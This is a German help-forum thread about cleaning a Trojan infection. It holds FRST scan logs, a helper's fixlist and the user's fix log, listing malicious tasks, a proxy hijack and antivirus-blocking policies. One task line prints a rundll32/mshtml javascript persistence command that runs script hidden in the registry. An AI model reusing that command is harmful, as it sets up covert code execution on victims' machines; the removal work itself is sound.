Task: {928B2F3B-2C64-4AED-9F1B-93315F01FBDC} - \afbfdcf4-7553-4735-ab81-4373cca9a051-7 No Task File <==== ATTENTION
Task: {99F31AC3-75A5-427A-A9A1-F7B67F954F82} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-1 No Task File <==== ATTENTION
Task: {A983A371-8E43-4C81-AB3D-1793E6C729DD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5_user No Task File <==== ATTENTION
Task: {ADB99999-9CE5-4C49-8F93-40086B7A25B0} - \afbfdcf4-7553-4735-ab81-4373cca9a051-11 No Task File <==== ATTENTION
Task: {B07D5064-3E65-4825-82D2-D8ABAFA800DB} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-4 No Task File <==== ATTENTION
Task: {B2DE553E-4F93-444A-B89F-264EA7144119} - System32\Tasks\1und1 Konfiguration => C:\ProgramData\1und1InternetExplorerAddon\ConfigTask.exe [2011-03-16] (1und1 Mail und Media GmbH)
Task: {B31760E5-4C25-4B17-AA41-19EBAB4B5530} - System32\Tasks\XPGILDE => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
Task: {CD87FD16-CBAA-439E-97ED-F35F08A43569} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5 No Task File <==== ATTENTION
Task: {D577D774-768A-41F6-807D-4B88E2B8F71A} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-3 No Task File <==== ATTENTION
Task: {E911148E-9670-41D8-BAE6-AB49D00F4C5E} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-11 No Task File <==== ATTENTION
Task: {EAA78C2F-DE4A-448D-B187-69456B16B48A} - \04b071f9-0b45-4ff0-af73-073c440df543-5 No Task File <==== ATTENTION
Task: {F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-7 No Task File <==== ATTENTION
Task: {F6739869-2927-42C5-B8E3-6A24E4A7A5A4} - \04b071f9-0b45-4ff0-af73-073c440df543-2 No Task File <==== ATTENTION
Task: {FB314ECF-96F0-41DC-8CC2-C2561140CB57} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-6 No Task File <==== ATTENTION
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\MQZDOUD.job => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: C:\Windows\Tasks\XPGILDE.job => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
==================== Loaded Modules (whitelisted) =============
2009-02-27 10:19 - 2008-06-11 11:18 - 00024576 _____ () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
2009-02-27 10:19 - 2009-02-27 10:19 - 00032768 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.Controller\3.0.3009.0__14bcaafdb44b5951\Framework.Model.Controller.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00009216 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.ControllerInterface\3.0.3009.0__d842b71b4d6ed079\Framework.Model.ControllerInterface.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00061440 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Library\3.0.3009.0__3036420f80dd6947\Framework.Library.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00015360 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Host\3.0.3009.0__672b450de5a7e94a\Framework.Host.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00006144 _____ () C:\Windows\assembly\GAC_MSIL\Framework.PluginInterface\3.0.3009.0__9ecdf03bb2054f94\Framework.PluginInterface.dll
2009-02-27 10:20 - 2009-02-27 10:20 - 00036864 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Utility\3.0.3009.0__4df5dcab8860d239\Framework.Utility.dll
2008-07-30 05:01 - 2003-06-07 06:30 - 00057344 _____ () C:\Program Files\Launch Manager\PowerUtl.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:9E22BBE8
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-717213786-2690546565-922636609-500 - Administrator - Disabled)
finja (S-1-5-21-717213786-2690546565-922636609-1000 - Administrator - Enabled) => C:\Users\finja
Gast (S-1-5-21-717213786-2690546565-922636609-501 - Limited - Disabled)
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
System errors:
=============
Microsoft Office Sessions:
=========================
CodeIntegrity Errors:
===================================
Date: 2014-12-06 16:31:55.653
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 16:31:55.029
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 16:31:54.405
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 16:31:53.812
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 16:11:32.432
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 15:51:10.190
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 15:51:09.521
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 15:51:08.787
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 15:51:08.085
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 15:40:48.924
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
==================== Memory info ===========================
Processor: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz
Percentage of memory in use: 38%
Total physical RAM: 3001.08 MB
Available physical RAM: 1840.15 MB
Total Pagefile: 6230.44 MB
Available Pagefile: 4947.89 MB
Total Virtual: 2047.88 MB
Available Virtual: 1887.38 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:288.08 GB) (Free:237.85 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 93D3AC9B)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=288.1 GB) - (Type=07 NTFS)
==================== End Of Log ============================
|
|
06.12.2014, 17:27
| #4 |
| | Trojan.FakeMS.ED in dll-Datei Schritt 1: FRST Fix Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code:
ATTFilter HKLM\...\Run: [eRecoveryService] => [X]
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [.DEFAULT] => http=127.0.0.1:53278;https=127.0.0.1:53278
SearchScopes: HKLM -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL =
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {FA23121F-EE7C-4BD8-8C06-123D087282C5} - No File
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {F2413FFA-9DCC-48B3-A09A-625F44D7FA96} - No File
FF NetworkProxy: "http", "127.0.0.1"
FF NetworkProxy: "http_port", 38159
FF NetworkProxy: "no_proxies_on", "localho,t,127.0.0.1,*origin.com,*ea.com,*akamaihd.net"
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
S2 compilerehtraceProt.exe; C:\Users\finja\AppData\Local\compilerehtraceProt\compilerehtraceProt.exe [X]
S2 evrtspkgBckp.exe; C:\Users\finja\AppData\Local\evrtspkgBckp\evrtspkgBckp.exe [X]
S2 FrozenGNUThumbnail.exe; C:\Users\finja\AppData\Local\FrozenGNUThumbnail\FrozenGNUThumbnail.exe [X]
S2 FrozenSambaWindows.exe; C:\Users\finja\AppData\Local\FrozenSambaWindows\FrozenSambaWindows.exe [X]
2014-12-03 19:45 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\ZorkoKcesd
2014-12-02 19:37 - 2014-12-02 19:37 - 00000000 ____D () C:\Windows\system32\utilitylocalspl_86
2014-12-02 19:34 - 2014-12-02 19:34 - 00000000 ____D () C:\Windows\system32\scrollingwin32Prot
2014-12-01 11:06 - 2014-12-06 15:37 - 00000000 ___HD () C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}
2014-12-01 11:06 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\EedtaWbezm
2014-11-28 20:51 - 2014-11-28 20:51 - 00000000 ____D () C:\ProgramData\UUdb
2014-11-11 08:40 - 2014-12-06 16:09 - 00001340 _____ () C:\Windows\Tasks\XPGILDE.job
2014-11-11 08:39 - 2014-12-06 16:09 - 00001684 _____ () C:\Windows\Tasks\MQZDOUD.job
C:\Users\finja\remove.exe
C:\Users\finja\AppData\Local\Temp\Quarantine.exe
C:\Users\finja\AppData\Local\Temp\sqlite3.dll
Task: {0BFFF69F-8A2D-4D08-9001-59641D3A012D} -
Task: {1045E6B6-E707-475F-97CD-571E06C36511} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-4 No Task File <==== ATTENTION
Task: {12725841-0DB7-461B-94D5-8A90F6589009} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {1EB9CADD-2506-46E7-96AD-5CBB99CAD30C} - \9038396b-6856-4ead-9ee7-1215f651f0aa No Task File <==== ATTENTION
Task: {26928486-85D4-43D1-846F-D5189AE90D56} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-1 No Task File <==== ATTENTION
Task: {33B6F316-29F5-4DEA-A8CC-B9249563A4AB} - \04b071f9-0b45-4ff0-af73-073c440df543-11 No Task File <==== ATTENTION
Task: {3738576E-1797-480B-AB26-9BECD9BC9AB1} - \04b071f9-0b45-4ff0-af73-073c440df543-4 No Task File <==== ATTENTION
Task: {4BF96ACD-C54D-472D-BD3D-8C4495786051} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5_user No Task File <==== ATTENTION
Task: {50B6DF40-8A74-4768-B9E7-44B068036A93} - \04b071f9-0b45-4ff0-af73-073c440df543-3 No Task File <==== ATTENTION
Task: {521C87B6-4ECD-45FA-A21F-0987123DD4C6} - \afbfdcf4-7553-4735-ab81-4373cca9a051-6 No Task File <==== ATTENTION
Task: {547E6824-355F-4AC3-8FBC-7E4FBF25D3EF} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5 No Task File <==== ATTENTION
Task: {665589FE-FED9-450D-8CAC-BCD6A34E666E} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-2 No Task File <==== ATTENTION
Task: {6ED78F91-0AE2-43BA-8C76-47269CF7A210} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-2 No Task File <==== ATTENTION
Task: {793BBF80-2488-4871-8D11-6A461B28C8DE} - System32\Tasks\MQZDOUD => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: {7BC36AEC-816F-4BC2-93E6-9836D38AAD73} - \04b071f9-0b45-4ff0-af73-073c440df543-1 No Task File <==== ATTENTION
Task: {88A4BAC1-045F-4DEC-B932-AEFCD853FCBB} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-11 No Task File <==== ATTENTION
Task: {8C6325F8-822B-4446-8F5E-79B27AA3A5D0} - \04b071f9-0b45-4ff0-af73-073c440df543-5_user No Task File <==== ATTENTION
Task: {928B2F3B-2C64-4AED-9F1B-93315F01FBDC} - \afbfdcf4-7553-4735-ab81-4373cca9a051-7 No Task File <==== ATTENTION
Task: {99F31AC3-75A5-427A-A9A1-F7B67F954F82} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-1 No Task File <==== ATTENTION
Task: {A983A371-8E43-4C81-AB3D-1793E6C729DD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5_user No Task File <==== ATTENTION
Task: {ADB99999-9CE5-4C49-8F93-40086B7A25B0} - \afbfdcf4-7553-4735-ab81-4373cca9a051-11 No Task File <==== ATTENTION
Task: {B07D5064-3E65-4825-82D2-D8ABAFA800DB} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-4 No Task File <==== ATTENTION
Task: {B31760E5-4C25-4B17-AA41-19EBAB4B5530} - System32\Tasks\XPGILDE => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
Task: {CD87FD16-CBAA-439E-97ED-F35F08A43569} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5 No Task File <==== ATTENTION
Task: {D577D774-768A-41F6-807D-4B88E2B8F71A} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-3 No Task File <==== ATTENTION
Task: {E911148E-9670-41D8-BAE6-AB49D00F4C5E} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-11 No Task File <==== ATTENTION
Task: {EAA78C2F-DE4A-448D-B187-69456B16B48A} - \04b071f9-0b45-4ff0-af73-073c440df543-5 No Task File <==== ATTENTION
Task: {F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-7 No Task File <==== ATTENTION
Task: {F6739869-2927-42C5-B8E3-6A24E4A7A5A4} - \04b071f9-0b45-4ff0-af73-073c440df543-2 No Task File <==== ATTENTION
Task: {FB314ECF-96F0-41DC-8CC2-C2561140CB57} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-6 No Task File <==== ATTENTION
Task: C:\Windows\Tasks\MQZDOUD.job => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: C:\Windows\Tasks\XPGILDE.job => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:9E22BBE8
EmptyTemp:
Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
Schritt 2: FRST Scan  Bitte starte FRST erneut, setze den Haken auch bei Addition.txt und drücke auf Scan. Schritt 3: ESET ESET Online Scanner
Schritt 4: Frage Wie läuft Dein PC?
__________________ Proud member of Unite |
|
06.12.2014, 21:03
| #5 |
| | Trojan.FakeMS.ED in dll-Datei Start-Up geht definitiv schneller, System ansich läuft auch stabiler und gefühlt schneller - daher schonmal danke. Hier dann noch die angefordeten Logs: Fixlog: Code:
ATTFilter Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 06-12-2014 02
Ran by finja at 2014-12-06 17:35:25 Run:1
Running from C:\Users\finja\Desktop
Loaded Profile: finja (Available profiles: finja)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
HKLM\...\Run: [eRecoveryService] => [X]
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [.DEFAULT] => http=127.0.0.1:53278;https=127.0.0.1:53278
SearchScopes: HKLM -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL =
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {FA23121F-EE7C-4BD8-8C06-123D087282C5} - No File
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {F2413FFA-9DCC-48B3-A09A-625F44D7FA96} - No File
FF NetworkProxy: "http", "127.0.0.1"
FF NetworkProxy: "http_port", 38159
FF NetworkProxy: "no_proxies_on", "localho,t,127.0.0.1,*origin.com,*ea.com,*akamaihd.net"
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
S2 compilerehtraceProt.exe; C:\Users\finja\AppData\Local\compilerehtraceProt\compilerehtraceProt.exe [X]
S2 evrtspkgBckp.exe; C:\Users\finja\AppData\Local\evrtspkgBckp\evrtspkgBckp.exe [X]
S2 FrozenGNUThumbnail.exe; C:\Users\finja\AppData\Local\FrozenGNUThumbnail\FrozenGNUThumbnail.exe [X]
S2 FrozenSambaWindows.exe; C:\Users\finja\AppData\Local\FrozenSambaWindows\FrozenSambaWindows.exe [X]
2014-12-03 19:45 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\ZorkoKcesd
2014-12-02 19:37 - 2014-12-02 19:37 - 00000000 ____D () C:\Windows\system32\utilitylocalspl_86
2014-12-02 19:34 - 2014-12-02 19:34 - 00000000 ____D () C:\Windows\system32\scrollingwin32Prot
2014-12-01 11:06 - 2014-12-06 15:37 - 00000000 ___HD () C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}
2014-12-01 11:06 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\EedtaWbezm
2014-11-28 20:51 - 2014-11-28 20:51 - 00000000 ____D () C:\ProgramData\UUdb
2014-11-11 08:40 - 2014-12-06 16:09 - 00001340 _____ () C:\Windows\Tasks\XPGILDE.job
2014-11-11 08:39 - 2014-12-06 16:09 - 00001684 _____ () C:\Windows\Tasks\MQZDOUD.job
C:\Users\finja\remove.exe
C:\Users\finja\AppData\Local\Temp\Quarantine.exe
C:\Users\finja\AppData\Local\Temp\sqlite3.dll
Task: {0BFFF69F-8A2D-4D08-9001-59641D3A012D} -
Task: {1045E6B6-E707-475F-97CD-571E06C36511} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-4 No Task File <==== ATTENTION
Task: {12725841-0DB7-461B-94D5-8A90F6589009} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {1EB9CADD-2506-46E7-96AD-5CBB99CAD30C} - \9038396b-6856-4ead-9ee7-1215f651f0aa No Task File <==== ATTENTION
Task: {26928486-85D4-43D1-846F-D5189AE90D56} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-1 No Task File <==== ATTENTION
Task: {33B6F316-29F5-4DEA-A8CC-B9249563A4AB} - \04b071f9-0b45-4ff0-af73-073c440df543-11 No Task File <==== ATTENTION
Task: {3738576E-1797-480B-AB26-9BECD9BC9AB1} - \04b071f9-0b45-4ff0-af73-073c440df543-4 No Task File <==== ATTENTION
Task: {4BF96ACD-C54D-472D-BD3D-8C4495786051} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5_user No Task File <==== ATTENTION
Task: {50B6DF40-8A74-4768-B9E7-44B068036A93} - \04b071f9-0b45-4ff0-af73-073c440df543-3 No Task File <==== ATTENTION
Task: {521C87B6-4ECD-45FA-A21F-0987123DD4C6} - \afbfdcf4-7553-4735-ab81-4373cca9a051-6 No Task File <==== ATTENTION
Task: {547E6824-355F-4AC3-8FBC-7E4FBF25D3EF} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5 No Task File <==== ATTENTION
Task: {665589FE-FED9-450D-8CAC-BCD6A34E666E} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-2 No Task File <==== ATTENTION
Task: {6ED78F91-0AE2-43BA-8C76-47269CF7A210} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-2 No Task File <==== ATTENTION
Task: {793BBF80-2488-4871-8D11-6A461B28C8DE} - System32\Tasks\MQZDOUD => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: {7BC36AEC-816F-4BC2-93E6-9836D38AAD73} - \04b071f9-0b45-4ff0-af73-073c440df543-1 No Task File <==== ATTENTION
Task: {88A4BAC1-045F-4DEC-B932-AEFCD853FCBB} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-11 No Task File <==== ATTENTION
Task: {8C6325F8-822B-4446-8F5E-79B27AA3A5D0} - \04b071f9-0b45-4ff0-af73-073c440df543-5_user No Task File <==== ATTENTION
Task: {928B2F3B-2C64-4AED-9F1B-93315F01FBDC} - \afbfdcf4-7553-4735-ab81-4373cca9a051-7 No Task File <==== ATTENTION
Task: {99F31AC3-75A5-427A-A9A1-F7B67F954F82} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-1 No Task File <==== ATTENTION
Task: {A983A371-8E43-4C81-AB3D-1793E6C729DD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5_user No Task File <==== ATTENTION
Task: {ADB99999-9CE5-4C49-8F93-40086B7A25B0} - \afbfdcf4-7553-4735-ab81-4373cca9a051-11 No Task File <==== ATTENTION
Task: {B07D5064-3E65-4825-82D2-D8ABAFA800DB} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-4 No Task File <==== ATTENTION
Task: {B31760E5-4C25-4B17-AA41-19EBAB4B5530} - System32\Tasks\XPGILDE => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
Task: {CD87FD16-CBAA-439E-97ED-F35F08A43569} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5 No Task File <==== ATTENTION
Task: {D577D774-768A-41F6-807D-4B88E2B8F71A} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-3 No Task File <==== ATTENTION
Task: {E911148E-9670-41D8-BAE6-AB49D00F4C5E} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-11 No Task File <==== ATTENTION
Task: {EAA78C2F-DE4A-448D-B187-69456B16B48A} - \04b071f9-0b45-4ff0-af73-073c440df543-5 No Task File <==== ATTENTION
Task: {F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-7 No Task File <==== ATTENTION
Task: {F6739869-2927-42C5-B8E3-6A24E4A7A5A4} - \04b071f9-0b45-4ff0-af73-073c440df543-2 No Task File <==== ATTENTION
Task: {FB314ECF-96F0-41DC-8CC2-C2561140CB57} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-6 No Task File <==== ATTENTION
Task: C:\Windows\Tasks\MQZDOUD.job => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: C:\Windows\Tasks\XPGILDE.job => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:9E22BBE8
EmptyTemp:
*****************
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\eRecoveryService => value deleted successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\TaskbarNoNotification => value deleted successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAHealth => value deleted successfully.
HKU\S-1-5-21-717213786-2690546565-922636609-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\TaskbarNoNotification => value deleted successfully.
HKU\S-1-5-21-717213786-2690546565-922636609-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAHealth => value deleted successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\S-1-5-21-717213786-2690546565-922636609-1000" => Key not found.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\S-1-5-21-717213786-2690546565-922636609-1000" => Key not found.
C:\Windows\system32\GroupPolicy\Machine => Moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => Moved successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value deleted successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value was restored successfully.
HKU\S-1-5-21-717213786-2690546565-922636609-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{FA23121F-EE7C-4BD8-8C06-123D087282C5} => value deleted successfully.
"HKCR\CLSID\{FA23121F-EE7C-4BD8-8C06-123D087282C5}" => Key not found.
